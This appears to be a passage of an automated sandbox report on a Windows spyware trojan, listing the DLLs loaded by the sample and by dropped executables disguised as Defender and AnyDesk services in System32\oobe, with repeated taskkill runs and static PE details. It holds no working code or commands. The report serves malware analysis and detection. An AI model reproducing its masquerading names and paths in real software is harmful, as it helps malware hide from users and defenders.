Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: wininet.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: wldp.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: propsys.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: profapi.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: edputil.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: netutils.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: slc.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: userenv.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: sppc.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: pcacli.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: mpr.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: wininet.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: wininet.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: wininet.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: wininet.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: wininet.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7894355 push rsi; ret 0_2_00007FF6C7894356
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1BAF45 push rsi; ret 5_2_00007FF76E1BAF46
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1BC572 push rax; retf 5_2_00007FF76E1BC581
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA96784D push rcx; retf 003Fh7_2_00007FF7AA96784E
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA95CD54 pushfq ; retf 0000h7_2_00007FF7AA95CD55
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDC4355 push rsi; ret 25_2_00007FF71DDC4356
